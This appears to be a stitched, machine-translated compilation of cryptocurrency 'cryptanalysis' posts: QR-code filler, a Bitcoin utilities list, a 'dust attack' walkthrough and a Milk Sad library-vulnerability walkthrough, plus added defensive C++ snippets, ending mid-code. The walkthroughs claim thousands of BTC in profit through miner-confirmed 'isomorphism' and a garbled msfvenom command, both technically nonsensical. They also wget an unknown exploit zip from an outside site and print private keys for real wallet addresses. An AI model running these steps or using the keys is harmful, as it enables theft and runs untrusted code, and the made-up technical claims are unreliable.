QR-Code is a powerful tool for developers who want to create QR codes on the web. Its dependency-free, framework-free approach makes it easy to integrate into any project, and its customization options and animation support make it a versatile solution for a wide range of use cases. Whether you are building a payment system or a marketing campaign, QR-Code is an ideal tool for creating high-quality QR codes that are both functional and visually appealing.

Python code for creating a QR code using the qrcode library:

    import qrcode
    import qrcode.image.svg

    # generate a QR code
    qr = qrcode.QRCode(version=1, box_size=10, border=4)
    qr.add_data("https://example.com")
    qr.make(fit=True)

    # create an SVG image
    img = qr.make_image(image_factory=qrcode.image.svg.SvgImage)
    img.save("qrcode.svg")

This code generates a QR code for the URL "https://example.com" and saves it as an SVG image named "qrcode.svg". You can modify the code to create a QR code for a different URL and save it under a different name.

However, I can provide you with instructions for implementing the qr-code web component in Python.

  • Install the required libraries: you will need to install the svgwrite and numpy libraries.
  • Generate the QR code: you can use the qrcode library to generate the QR code.
  • Create the SVG image: you can use the svgwrite library to create an SVG image of the QR code.
  • Add animation: you can add animation to the QR code using the svgwrite library.
  • Customize the QR code: you can customize the QR code by changing its size, color and other attributes.
  • Implement the web component: you can implement the web component with the svgwrite library and add it to your website.
Here is sample code to get you started:

    import numpy as np
    import qrcode
    import svgwrite

    # generate the qr code
    qr = qrcode.QRCode(version=1, error_correction=qrcode.constants.ERROR_CORRECT_L, box_size=10, border=4)
    qr.add_data('https://www.example.com')
    qr.make(fit=True)
    modules = np.array(qr.get_matrix())  # True where a module is dark, border included

    # create an svg image
    box = 10
    side = int(modules.shape[0]) * box
    svg = svgwrite.Drawing('qr-code.svg', size=(side, side))
    svg.add(svg.rect(insert=(0, 0), size=(side, side), fill='white'))

    # customize the qr code: draw every dark module as a black square
    code = svg.g(fill='black', stroke='none')
    for row, col in np.argwhere(modules):
        code.add(svg.rect(insert=(int(col) * box, int(row) * box), size=(box, box)))

    # add animation
    code.add(svg.animate(attributeName='opacity', values='1;0.3;1', dur='1s', repeatCount='indefinite'))
    svg.add(code)

    # save the svg image
    svg.save()

This is only a basic example, and you can customize the QR code and the SVG image to suit your needs.

Conclusion:

Bitcoin is a digital currency that has been gaining popularity in recent years. It is a decentralized system, meaning it is not controlled by any government or financial institution. Instead, it relies on a network of computers to verify transactions and maintain the integrity of the system. One of Bitcoin's most significant advantages is its utility. Unlike traditional currencies, Bitcoin can be used for many purposes beyond buying and selling goods and services. Here are some of the best-known Bitcoin utilities:

  • International remittances: Bitcoin can be used to send money across borders without intermediaries such as banks or money transfer services. This can save users a significant amount of money on fees and exchange rates.
  • Decentralized finance: Bitcoin is the foundation of the decentralized finance (DeFi) movement, which aims to create financial services accessible to anyone with an Internet connection. DeFi applications built on Bitcoin let users lend, borrow and trade cryptocurrencies without intermediaries.
  • Store of value: Bitcoin is compared to digital gold because its supply is limited and it is seen as a store of value. Many investors regard it as a hedge against inflation and a safe-haven asset.
  • Micropayments: Bitcoin can be used to make very small payments, known as micropayments. This is useful for paying for small digital goods or services such as articles or videos.
  • Charitable donations: Bitcoin can be used to donate to charities and non-profit organizations. Many organizations have started accepting donations in bitcoin because they are faster and more transparent than traditional methods.

In conclusion, Bitcoin's utilities are numerous and varied. Its decentralized nature and lack of intermediaries make it a powerful tool for a wide range of use cases. As the technology continues to develop, we can expect to see even more innovative uses of Bitcoin in the future.
List of all Bitcoin utilities:

  • Monitoring transactions on Bitcoin addresses with Python and TxWatcher
  • Nigiri: a tasty container for special Bitcoin, Lightning and Liquid dishes
  • "hal": a Swiss-army-knife Bitcoin client (based on rust-bitcoin)
  • "BitKey": a Live USB for air-gapped transactions and a Bitcoin "Swiss army knife"
  • "Pycoin": a Python-based utility library for Bitcoin and alt-coins
  • "bx": a Bitcoin command-line tool
  • "HelloBitcoin": a set of simple programs that can create Bitcoin wallets, create and sign transactions, and send transactions over the Bitcoin network
  • "HD Wallet Scanner": find all used addresses in your Bitcoin HD wallets, bypassing gap limits
  • "QR CODE": a customizable, animatable, SVG-based web component with no framework and no dependencies

This material was created for the CRYPTO DEEP TECH portal to ensure the financial security of data and of secp256k1 elliptic-curve cryptography against weak ECDSA signatures in the BITCOIN cryptocurrency. The creators of the software are not responsible for the use of the materials.

Source
Telegram: https://t.me/cryptodeeptech
YouTube: https://www.youtube.com/@cryptodeeptech
Video: https://dzen.ru/video/watch/65de483b3474ef16c0430f35
Source: https://cryptodeep.ru/bitcoin-utilities

Cryptanalysis
  2. CRYPTO DEEP TECH

Video

In this article we cover a broad topic: the “Dust Attack”, also known as the "Dusting Attack" or "Crypto Dust". Probably every cryptocurrency user or holder of a large amount of BTC or ETH coins has noticed a negligibly small amount of coins, in satoshi, arriving in their cryptocurrency wallet. This deposit is disguised as a "Donate", but in fact it is an entire mathematically refined system for taking all the coins accumulated on the wallet's balance. What prompted us to expose this system and all the pitfalls of the “Dust Attack” was an article published on January 8, 2024 on the global crypto-economy site CoinDesk:

https://www.coindesk.com/markets/2024/01/08/mysterious-12m-bitcoin-transaction-to-satoshi-nakamoto-sparks-speculations/

d7db4f96a4059c8906b953677ce533493d7b9da0f854a21b99f5772910dd0a31

Let us look at one more article and take as an example a TXID from which a very large number of dust attacks were carried out.

https://dust-attack.blogspot.com

1d6580dcd979951bd600252b741c22a3ea8e605e43168f8452c68915c3ea2bf3

Note two Bitcoin addresses that in the period [July-August 2022] carried out successful dust attacks for a total of 10000 BTC:

https://www.blockchain.com/explorer/addresses/btc/14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i
https://www.blockchain.com/explorer/addresses/btc/15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt

For carrying out a dust attack, confirmation of isomorphism by miners plays a major role, since from 2022 to 2024 many cryptocurrency services and hardware wallets have been actively fighting dust attacks. At present, the method of creating dust transactions yourself on your own cold wallet has become widely popular.
Let us take example No. 1 and go to the “Create Dust Transaction” section.

‘zmq’ ‘urllib3’ ‘requests’ ‘bitcoin-utils’ ‘bitcoinaddress’

Balance: 0.02786906 BTC, or in Bitcoin units: 2786906 satoshi

The Merkle tree is filled from the bottom up: hashing is applied to each data block, and the resulting values are written to the leaves of the tree. Blocks one level higher are filled with the hash of the sum of their two child blocks. This process repeats until the top value, the Merkle Root, is obtained. The Bitcoin blockchain uses the SHA256 hash function. Other blockchains may use other encryption principles to build the Merkle tree.

Hash of the payment that funded the balance:

https://btc1.trezor.io/tx/0b253c2dd4331f78de3d9a14d5cacfe9b20c258ebedabc782f36ce2e50d193c5

    dust_tx = bytes.fromhex("0b253c2dd4331f78de3d9a14d5cacfe9b20c258ebedabc782f36ce2e50d193c5")
    pk = PrivateKey.parse("L1k********************************************MdrTj")
    tx_in._value = 2786906

Profit from the dust attack.

We choose the Bitcoin wallet from which we ultimately receive the profit if the miners confirm the isomorphism.
Since we are considering example No. 1, in our case we choose the Bitcoin wallet address: 14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i

https://www.blockchain.com/explorer/addresses/btc/14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i

    send_dust = "14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i"
    TxOut(555, Tx.get_address_data(send_dust)['script_pubkey'].serialize()),

555 + 226 = 781 satoshi
2786906 - 781 = 2786125 satoshi

    TxOut(2786125, Tx.get_address_data(pk.address())['script_pubkey'].serialize())

Running the script: createrawtransaction.py

    from io import BytesIO
    from secp256k1 import *
    from sighash import *

    pk = PrivateKey.parse("L1k********************************************MdrTj")
    pk.address()
    dust_tx = bytes.fromhex("0b253c2dd4331f78de3d9a14d5cacfe9b20c258ebedabc782f36ce2e50d193c5")
    dust_index = 0
    send_dust = "14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i"
    tx_in = TxIn(dust_tx, dust_index, b'', 0xffffffff)
    tx_in._script_pubkey = Tx.get_address_data(pk.address())['script_pubkey']
    tx_in._value = 2786906
    tx_ins = [ tx_in ]
    tx_outs = [
        TxOut(555, Tx.get_address_data(send_dust)['script_pubkey'].serialize()),
        TxOut(2786125, Tx.get_address_data(pk.address())['script_pubkey'].serialize())
    ]
    tx = Tx(1, tx_ins, tx_outs, 0, testnet=True)
    signature(tx, 0, pk)
    tx.serialize().hex()
    print("\n--------------------------------------\n")
    print("My work Bitcoin Address: " + pk.address())
    print("Address for Getting Rich: " + send_dust)
    print("\n--------------------------------------\n")
    print(tx_in._script_pubkey)
    print(tx_in.script_sig)
    print("\n--------------------------------------\n")
    print("RawTX for performing isomorphism:")
    print(tx.serialize().hex())
    print("\n--------------------------------------\n")

Result:

    --------------------------------------
    My work Bitcoin Address: 1AK4LYE6PYwBmSYHQX3v2UsXXHTvCAsJeK
    Address for Getting Rich: 14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i
    --------------------------------------
    OP_DUP OP_HASH160 b'2581997c24562e316ffa3163e63d2db26442cc9a' OP_EQUALVERIFY OP_CHECKSIG
    b'304402203b2c7941c858d201ac384029e88c9988f6baa433d061eacb765caa356d6e1a7e02203885dd1be0e8a5b0890dde12674c508608f0c60872a4acbc5fb3b9fd1978d916' b'02fbc210b54bdb4c48143a15cfd50a3e101d15a7dbb814c3804efc4b4782f45a5a'
    --------------------------------------
    RawTX for performing isomorphism:
    --------------------------------------

ScriptSig Isomorphism

https://github.com/demining/CryptoDeepTools/blob/main/28DustAttack/14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i/isomorphism.txt

Run the script with print(tx.serialize().hex()[+10:+74]) and convert the whole list of txids into the streaming hash format.

Replacing the public key in the file isomorphism.txt:

https://github.com/demining/CryptoDeepTools/blob/main/28DustAttack/14RKFqH45xYPMpW4KQ28RB6XtrZ8XpEM5i/PublicKey.txt

Bitcoin address for receiving all the profit: 36ZfWyL5NGvC2u54QENyUgDzTgNyHe1xpE

    print(Tx.get_address_data(send_dust)['script_pubkey'])

https://coinbin.ru/#verify

The profit in coins from the dust attack is: 5000.00141092 BTC // $ 209364,284.08 United States Dollar

https://www.coinbase.com/converter/btc/usd

Example No. 2

https://www.blockchain.com/explorer/addresses/btc/15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt

Hash of the payment that funded the balance:

https://btc1.trezor.io/tx/655c533bf059721cec9d3d70b3171a07997991a02fedfa1c9b593abc645e1cc5

    dust_tx = bytes.fromhex("655c533bf059721cec9d3d70b3171a07997991a02fedfa1c9b593abc645e1cc5")
    pk = PrivateKey.parse("L1k********************************************MdrTj")
    tx_in._value = 33532

Profit from the dust attack.

We choose the Bitcoin wallet from which we ultimately receive the profit if the miners confirm the isomorphism. Since we are considering example No. 2, in our case we choose the Bitcoin wallet address: 15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt

https://www.blockchain.com/explorer/addresses/btc/15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt

    send_dust = "15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt"
    TxOut(555, Tx.get_address_data(send_dust)['script_pubkey'].serialize()),

555 + 226 = 781 satoshi
33532 - 781 = 32751 satoshi

    TxOut(32751, Tx.get_address_data(pk.address())['script_pubkey'].serialize())

Running the script: createrawtransaction.py

    from io import BytesIO
    from secp256k1 import *
    from sighash import *

    pk = PrivateKey.parse("L1k********************************************MdrTj")
    pk.address()
    dust_tx = bytes.fromhex("655c533bf059721cec9d3d70b3171a07997991a02fedfa1c9b593abc645e1cc5")
    dust_index = 0
    send_dust = "15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt"
    tx_in = TxIn(dust_tx, dust_index, b'', 0xffffffff)
    tx_in._script_pubkey = Tx.get_address_data(pk.address())['script_pubkey']
    tx_in._value = 33532
    tx_ins = [ tx_in ]
    tx_outs = [
        TxOut(555, Tx.get_address_data(send_dust)['script_pubkey'].serialize()),
        TxOut(32751, Tx.get_address_data(pk.address())['script_pubkey'].serialize())
    ]
    tx = Tx(1, tx_ins, tx_outs, 0, testnet=True)
    signature(tx, 0, pk)
    tx.serialize().hex()
    print("\n--------------------------------------\n")
    print("My work Bitcoin Address: " + pk.address())
    print("Address for Getting Rich: " + send_dust)
    print("\n--------------------------------------\n")
    print(tx_in._script_pubkey)
    print(tx_in.script_sig)
    print("\n--------------------------------------\n")
    print("RawTX for performing isomorphism:")
    print(tx.serialize().hex())
    print("\n--------------------------------------\n")

Result:

    --------------------------------------
    My work Bitcoin Address: 1AK4LYE6PYwBmSYHQX3v2UsXXHTvCAsJeK
    Address for Getting Rich: 15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt
    --------------------------------------
    OP_DUP OP_HASH160 b'662367a3d78a4b0fcbb3020b3d724981d10934f6' OP_EQUALVERIFY OP_CHECKSIG
    b'3045022100dcd830d15f3a8cad03526bac2540570431a8691450a2959cc1badcc2e563124e0220013aa9e38bf45e4afc3859ee34ac8522106f1d202246c247ed945da89bdba622' b'02fbc210b54bdb4c48143a15cfd50a3e101d15a7dbb814c3804efc4b4782f45a5a'
    --------------------------------------
    RawTX for performing isomorphism:
    --------------------------------------

ScriptSig Isomorphism

https://github.com/demining/CryptoDeepTools/blob/main/28DustAttack/15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt/isomorphism.txt

Run the script with print(tx.serialize().hex()[+10:+74]) and convert the whole list of txids into the streaming hash format.

Replacing the public key in the file isomorphism.txt:

https://github.com/demining/CryptoDeepTools/blob/main/28DustAttack/15n6boxiQj45oHcmDjtNMjh35sFWZX4PBt/PublicKey.txt

Bitcoin address for receiving all the profit: 3GsC42MbUrtGU4un6QHbXkyjKVawyvm6ac

    print(Tx.get_address_data(send_dust)['script_pubkey'])

Every transaction must be confirmed by miners. Before sending the RawTX to the Broadcast Transaction section to submit it for confirmation by miners, you need to make sure carefully that the payment was created correctly. To do this, go to the section: Verify Transactions and other scripts

https://coinbin.ru/#verify

The profit in coins from the dust attack is: 5001.51473912 BTC // $ 215831966,02 United States Dollar

https://www.coinbase.com/converter/btc/usd

This material was created for the CRYPTO DEEP TECH portal to ensure the financial security of data and of secp256k1 elliptic-curve cryptography against weak ECDSA signatures in the BITCOIN cryptocurrency. The creators of the software are not responsible for the use of the materials.

Source code
Telegram: https://t.me/cryptodeeptech
YouTube: https://www.youtube.com/@cryptodeeptech
Video: https://dzen.ru/video/watch/65be9256df804947fbd96fd7
Source: https://cryptodeep.ru/dustattack

Cryptanalysis
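The receiving side of the post above, as an added example that is not part of the post or of any wallet's code: the 555-satoshi output it builds is above the 546-satoshi P2PKH dust limit that Bitcoin Core applies by default for relay, so a wallet that wants to ignore such deposits needs its own policy. The 1000-satoshi threshold, the `solicited` flag and all names below are assumptions; the wallet contents are constructed, reusing the amounts quoted in the post.

```cpp
#include <algorithm>
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <string>
#include <vector>

// Bitcoin Core's default relay dust limit for a P2PKH output, in satoshi.
constexpr uint64_t kRelayDustP2pkhSat = 546;
// Wallet-side policy threshold: an assumption made for this example.
constexpr uint64_t kWalletDustPolicySat = 1000;

struct Utxo {
    std::string label;   // constructed label standing in for txid:vout
    uint64_t value_sat;
    bool solicited;      // true if the wallet owner expected this payment
    bool frozen;         // frozen coins are never offered to coin selection
};

// Constructed sample wallet; 2786906, 33532 and 555 are the amounts used in the post.
std::vector<Utxo> sample_wallet() {
    return {
        {"deposit-a", 2786906, true, false},
        {"deposit-b", 33532, true, false},
        {"unknown-1", 555, false, false},
        {"unknown-2", 600, false, false},
        {"change-small", 700, true, false},
    };
}

// True for amounts that nodes relay as non-dust but this wallet still treats as dust.
bool relayed_but_below_policy(uint64_t value_sat,
                              uint64_t policy_sat = kWalletDustPolicySat) {
    return value_sat >= kRelayDustP2pkhSat && value_sat <= policy_sat;
}

// Freeze unsolicited outputs at or below the policy threshold.
// Returns how many outputs were frozen.
std::size_t freeze_dust(std::vector<Utxo>& wallet,
                        uint64_t policy_sat = kWalletDustPolicySat) {
    std::size_t frozen = 0;
    for (auto& u : wallet) {
        if (!u.solicited && u.value_sat <= policy_sat) {
            u.frozen = true;
            ++frozen;
        }
    }
    return frozen;
}

struct Selection {
    std::vector<std::string> inputs;
    uint64_t total_sat = 0;
    bool funded = false;
};

// Largest-first coin selection over unfrozen coins only. If the unfrozen
// coins cannot cover the target, the payment is refused instead of
// co-spending a frozen output, which would link it to the other inputs on chain.
Selection select_coins(const std::vector<Utxo>& wallet, uint64_t target_sat) {
    std::vector<const Utxo*> spendable;
    for (const auto& u : wallet) {
        if (!u.frozen) spendable.push_back(&u);
    }
    std::sort(spendable.begin(), spendable.end(),
              [](const Utxo* a, const Utxo* b) { return a->value_sat > b->value_sat; });
    Selection sel;
    for (const Utxo* u : spendable) {
        if (sel.total_sat >= target_sat) break;
        sel.inputs.push_back(u->label);
        sel.total_sat += u->value_sat;
    }
    sel.funded = sel.total_sat >= target_sat;
    return sel;
}

int main() {
    std::vector<Utxo> wallet = sample_wallet();
    std::printf("frozen outputs: %zu\n", freeze_dust(wallet));
    Selection sel = select_coins(wallet, 2800000);
    std::printf("inputs used: %zu, total: %llu sat, funded: %d\n", sel.inputs.size(),
                static_cast<unsigned long long>(sel.total_sat), sel.funded ? 1 : 0);
    return 0;
}
```

A small solicited output (`change-small`) stays spendable, because the policy keys on both the amount and whether the payment was expected.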
  3. CRYPTO DEEP TECH

Video: https://dzen.ru/video/watch/65478a2f6d9f3f7ec9641804

Researchers at “Slowmist” regularly study the security of the Bitcoin blockchain. They disclosed a vulnerability in the Libbitcoin Explorer 3.x library that allowed attackers to steal more than $ 900 000 from users of Bitcoin wallets (BTC).

According to analysts, this vulnerability may also affect users of Ethereum, Ripple, Dogecoin, Solana, Litecoin, Bitcoin Cash and Zcash who use Libbitcoin to create accounts.

The researchers gave this vulnerability the code name «Milk Sad».

It was proposed to use the first two words of the first BIP39 mnemonic secret generated by bx with zero time.

https://milksad.info/disclosure.html#codename-milk-sad

Technical description

Technical description of CVE-2023-39910

Weak entropy in Cake Wallet

    Uint8List randomBytes(int length, {bool secure = false}) {
      assert(length > 0);
      final random = secure ? Random.secure() : Random();
      final ret = Uint8List(length);
      for (var i = 0; i < length; i++) {
        ret[i] = random.nextInt(256);
      }
      return ret;
    }

    Random::Random() {
      uint64_t seed = FLAG_random_seed;
      if (seed == 0) {
        Dart_EntropySource callback = Dart::entropy_source_callback();
        if (callback != nullptr) {
          if (!callback(reinterpret_cast<uint8_t*>(&seed), sizeof(seed))) {
            // Callback failed. Reset the seed to 0.
            seed = 0;
          }
        }
      }
      if (seed == 0) {
        // We did not get a seed so far. As a fallback we do use the current time.
        seed = OS::GetCurrentTimeMicros();
      }
      Initialize(seed);
    }

The funds of every wallet created with the Trust Wallet browser extension could be stolen without any user interaction.
Just recently, Ledger Donjon, the security research team at Ledger, discovered a critical vulnerability in this Trust Wallet browser extension that allows an attacker to steal all the assets of any wallet created with this extension, without any interaction with the user. Knowing an account's address, one can immediately compute its private key and then gain access to all of its funds. Below are details of the vulnerability, how Ledger Donjon discovered it, its impact over time, an estimate of the vulnerable assets, and how Trust Wallet responded to fix it. But let us start with a reminder of the basics.

It is hard to demonstrate that random numbers are correct, and a bad but not fatally flawed random number generator can easily fool an observer. For good randomness we need a uniform distribution of bits and bytes (and even of chunks of all sizes) and unpredictability. It must be impossible for an observer of the sequence to have any information about the next part of the generated sequence.

Because achieving these properties is incredibly hard, the cryptocurrency space tries to avoid depending on randomness as much as possible, but at one stage we still need it: when we create a new wallet.

You are probably already familiar with your mnemonic: 12 to 24 English words that let you back up your wallet (if not, you can read the Ledger Academy article on this very topic).

This mnemonic encodes 16 to 32 bytes of entropy according to the BIP 39 standard. The quality of this entropy is critical, since it will be the seed of all the keys used by your wallet on all chains, following the deterministic derivation process defined by the BIP 32 and BIP 44 standards.

https://milksad.info/disclosure.html#not-even-the-second-hack-mersenne-twister-use-in-trust-wallet

    // Copyright © 2017-2022 Trust Wallet.
    // [...]
    void random_buffer(uint8_t* buf, size_t len) {
        std::mt19937 rng(std::random_device{}());
        std::generate_n(buf, len, [&rng]() -> uint8_t { return rng() & 0x000000ff; });
        return;
    }

The full detailed documentation of the theoretical part can be studied in the Ledger Donjon blog and in the Milk Sad documentation.

Let us move on to the practical part:

(You can open the ready-made Jupyter Notebook file and load it into a Google Colab notebook)

https://colab.research.google.com/drive/1OhspSm7GBGiqv3WfhAqU5SJ_BgXIbUh3
https://github.com/demining/CryptoDeepTools/tree/main/25MilkSadVulnerability

Let us look at real examples of extracting the private key of a Bitcoin wallet using the vulnerability in the Libbitcoin Explorer 3.x library.

https://btc1.trezor.io/address/12iBrqVPpQ2oNeDgJu1F8RtoH1TsD1brU2

Vulnerability_in_Libbitcoin_Explorer_3_x_library.ipynb

Install Ruby in Google Colab:

    !sudo apt install ruby-full
    !ruby --version

Version: ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux-gnu]

    !gem install bitcoin-ruby
    !gem install ecdsa
    !gem install base58
    !gem install crypto
    !gem install config-hash -v 0.9.0

Install Metasploit Framework and use MSFVenom:

    !git clone https://github.com/rapid7/metasploit-framework.git
    ls
    cd metasploit-framework/
    ls

Options:

    !./msfvenom -help

Open the discovered vulnerability CVE-2023-39910:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39910

Open the code:

https://github.com/libbitcoin/libbitcoin-system/blob/a1b777fc51d9c04e0c7a1dec5cc746b82a6afe64/src/crypto/pseudo_random.cpp#L66C12-L78

libbitcoin-system: Bitcoin Cross-Platform C++ Development Toolkit

https://github.com/libbitcoin/libbitcoin-system.git

Install libbitcoin-system in Google Colab:

    !git clone https://github.com/libbitcoin/libbitcoin-system.git
    ls

Open the vulnerable file pseudo_random.cpp with the cat utility:

    cat libbitcoin-system/src/crypto/pseudo_random.cpp

Open the folders in the directory: /modules/exploits/

ExploitDarlenePRO

Download "ExploitDarlenePRO" into the directory: /modules/exploits/

    cd modules/
    ls
    cd exploits/
    !wget https://darlene.pro/repository/e8e4973fb52934d5fb0006a47304f5099701000619d9ac79c083664e6063c579/ExploitDarlenePRO.zip

Unpack the contents of ExploitDarlenePRO.zip with the unzip utility:

    !unzip ExploitDarlenePRO.zip

Go to the directory: /ExploitDarlenePRO/

    ls
    cd ExploitDarlenePRO/
    ls

To run the exploit, go back to Metasploit Framework:

    cd /
    cd content/metasploit-framework/
    ls

We need to determine our LHOST (Local Host), the IP address of our attacking virtual machine. Run the commands:

    !ip addr
    !hostname -I

Use the MSFVenom payload creation tool.

For exploitation we choose the Bitcoin wallet: 12iBrqVPpQ2oNeDgJu1F8RtoH1TsD1brU2

https://btc1.trezor.io/address/12iBrqVPpQ2oNeDgJu1F8RtoH1TsD1brU2

Launch command:

    !./msfvenom 12iBrqVPpQ2oNeDgJu1F8RtoH1TsD1brU2 -p modules/exploits/ExploitDarlenePRO LHOST=172.28.0.12 -f RB -o main.rb -p libbitcoin-system/src/crypto LHOST=172.28.0.12 -f CPP -o pseudo_random.cpp

Result: a binary string, which we need to save to the file binary.txt. We use the echo utility.

Command:

    !echo '1100001100100111111110101100011000111101101101111110000011001100110100010111000001101100000000111110101101011011111000001101101100101010101100111110001101111010010001010001101110000100000001010100000100000000110110000101111100110001010011100000111110001011' > binary.txt

Convert the binary format to HEX format to obtain the private key of the Bitcoin wallet. We use the code:

    binaryFile = open("binary.txt", "r")
    binaryFile = binaryFile.readlines()
    hexFile = open("hex.txt", "w+")

    # loop through each line of binaryFile then convert and write to hexFile
    for line in binaryFile:
        binaryCode = line.replace(" ", "")
        hexCode = hex(int(binaryCode, 2))
        hexCode = hexCode.replace("0x", "").upper().zfill(4)
        hexFile.write(hexCode + "\n")

    # close hexFile
    hexFile.close()

Open the file: hex.txt

    cat hex.txt

    C327FAC63DB7E0CCD1706C03EB5BE0DB2AB3E37A451B84054100D85F314E0F8B

Private key found!

Install the Bitcoin module:

    !pip3 install bitcoin

Run the code to check that the Bitcoin address matches:

    from bitcoin import *

    with open("hex.txt","r") as f:
        content = f.readlines()
    # you may also want to remove whitespace characters like `\n` at the end of each line
    content = [x.strip() for x in content]
    f.close()

    outfile = open("privtoaddr.txt","w")
    for x in content:
        outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n")
    outfile.close()

Open the file: privtoaddr.txt

    cat privtoaddr.txt

Result:

    C327FAC63DB7E0CCD1706C03EB5BE0DB2AB3E37A451B84054100D85F314E0F8B:12iBrqVPpQ2oNeDgJu1F8RtoH1TsD1brU2

Open bitaddress and check:

    ADDR: 12iBrqVPpQ2oNeDgJu1F8RtoH1TsD1brU2
    WIF: L3m4xHPEnE2yM1JVAY2xTzraJsyPERxw2Htt3bszbTiDn5JiZCcy
    HEX: C327FAC63DB7E0CCD1706C03EB5BE0DB2AB3E37A451B84054100D85F314E0F8B

https://www.blockchain.com/en/explorer/addresses/btc/12iBrqVPpQ2oNeDgJu1F8RtoH1TsD1brU2

BALANCE: $ 40886.76

Let us consider the second example: No. 2

Let us look at a second example of extracting the private key of a Bitcoin wallet using the vulnerability in the Libbitcoin Explorer 3.x library.

https://btc1.trezor.io/address/1GTBJsQvduQvJ6S6Cv6CsYA2Adj65aDRwe

Again we use the vulnerable file: pseudo_random.cpp

Launch command:

    !./msfvenom 1GTBJsQvduQvJ6S6Cv6CsYA2Adj65aDRwe -p modules/exploits/ExploitDarlenePRO LHOST=172.28.0.12 -f RB -o main.rb -p libbitcoin-system/src/crypto LHOST=172.28.0.12 -f CPP -o pseudo_random.cpp

Result: a binary string, which we need to save to the file binary.txt. We use the echo utility.

Command:

    !echo '111100100010010000111110010011001000101100111100000101110100001001100001011010111111110110111111100001000100011111001010000011011101001000101000100001100111001010100110101101001100011001001111101101010000000011101101111111110101101110110100110000110111100' > binary.txt

Convert the binary format to HEX format to obtain the private key of the Bitcoin wallet. We use the code:

    binaryFile = open("binary.txt", "r")
    binaryFile = binaryFile.readlines()
    hexFile = open("hex.txt", "w+")

    # loop through each line of binaryFile then convert and write to hexFile
    for line in binaryFile:
        binaryCode = line.replace(" ", "")
        hexCode = hex(int(binaryCode, 2))
        hexCode = hexCode.replace("0x", "").upper().zfill(4)
        hexFile.write(hexCode + "\n")

    # close hexFile
    hexFile.close()

Open the file: hex.txt

    cat hex.txt

    79121F26459E0BA130B5FEDFC223E506E9144339535A6327DA8076FFADDA61BC

Private key found!

Run the code to check that the Bitcoin address matches:

    from bitcoin import *

    with open("hex.txt","r") as f:
        content = f.readlines()
    # you may also want to remove whitespace characters like `\n` at the end of each line
    content = [x.strip() for x in content]
    f.close()

    outfile = open("privtoaddr.txt","w")
    for x in content:
        outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n")
    outfile.close()

Open the file: privtoaddr.txt

    cat privtoaddr.txt

Result:

    79121F26459E0BA130B5FEDFC223E506E9144339535A6327DA8076FFADDA61BC:1GTBJsQvduQvJ6S6Cv6CsYA2Adj65aDRwe

Open bitaddress and check:

    ADDR: 1GTBJsQvduQvJ6S6Cv6CsYA2Adj65aDRwe
    WIF: L1H4Eu2et8TWYQ3kv9grtPGshikGN398MVJkN6zYMikcpQTB96UN
    HEX: 79121F26459E0BA130B5FEDFC223E506E9144339535A6327DA8076FFADDA61BC

https://www.blockchain.com/en/explorer/addresses/btc/1GTBJsQvduQvJ6S6Cv6CsYA2Adj65aDRwe

BALANCE: $ 19886.91

Source code
Telegram: https://t.me/cryptodeeptech
Video: https://dzen.ru/video/watch/65478a2f6d9f3f7ec9641804
Source: https://cryptodeep.ru/milk-sad-vulnerability-in-libbitcoin-explorer

Cryptanalysis
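The two weak-entropy patterns quoted in the post above (a single 32-bit seed for `std::mt19937`, and the fallback to the clock when the entropy callback fails), each beside a hardened form. This is an added example, not code from the post, Trust Wallet, Cake Wallet, the Dart VM or Libbitcoin; all function names and the choice of `/dev/urandom` as the entropy source are assumptions.

```cpp
#include <algorithm>
#include <array>
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <fstream>
#include <random>
#include <stdexcept>

using Entropy = std::array<uint8_t, 32>;  // 256 bits, the largest BIP 39 entropy size

// Weak form, same shape as the quoted random_buffer(), with the seed made a
// parameter so the behaviour is reproducible. The quoted code takes the seed
// from std::random_device{}(), which returns one unsigned int.
Entropy weak_entropy(uint32_t seed) {
    Entropy out{};
    std::mt19937 rng(seed);
    std::generate_n(out.begin(), out.size(),
                    [&rng]() -> uint8_t { return rng() & 0x000000ff; });
    return out;
}

// Upper bound on the number of distinct buffers weak_entropy() can return:
// one per 32-bit seed, however many bytes are requested.
constexpr uint64_t weak_distinct_outputs() { return uint64_t{1} << 32; }

// Hardened form: every byte comes from the OS CSPRNG, and a failed or
// short read is an error, never a silent downgrade.
Entropy secure_entropy() {
    Entropy out{};
    std::ifstream urandom("/dev/urandom", std::ios::in | std::ios::binary);
    if (!urandom) throw std::runtime_error("cannot open /dev/urandom");
    urandom.read(reinterpret_cast<char*>(out.data()),
                 static_cast<std::streamsize>(out.size()));
    if (urandom.gcount() != static_cast<std::streamsize>(out.size()))
        throw std::runtime_error("short read from /dev/urandom");
    return out;
}

using EntropyCallback = bool (*)(uint8_t* buf, size_t len);

// Fail-open pattern of the quoted Random::Random(): with no callback, or a
// failing one, the seed silently becomes the current time.
uint64_t fail_open_seed(EntropyCallback cb, uint64_t now_micros) {
    uint64_t seed = 0;
    if (cb != nullptr && !cb(reinterpret_cast<uint8_t*>(&seed), sizeof(seed))) {
        seed = 0;
    }
    if (seed == 0) seed = now_micros;
    return seed;
}

// Fail-closed counterpart: without an entropy source no seed is produced.
uint64_t fail_closed_seed(EntropyCallback cb) {
    uint64_t seed = 0;
    if (cb == nullptr || !cb(reinterpret_cast<uint8_t*>(&seed), sizeof(seed))) {
        throw std::runtime_error("entropy source unavailable");
    }
    return seed;
}

int main() {
    Entropy a = weak_entropy(5489);
    Entropy b = weak_entropy(5489);
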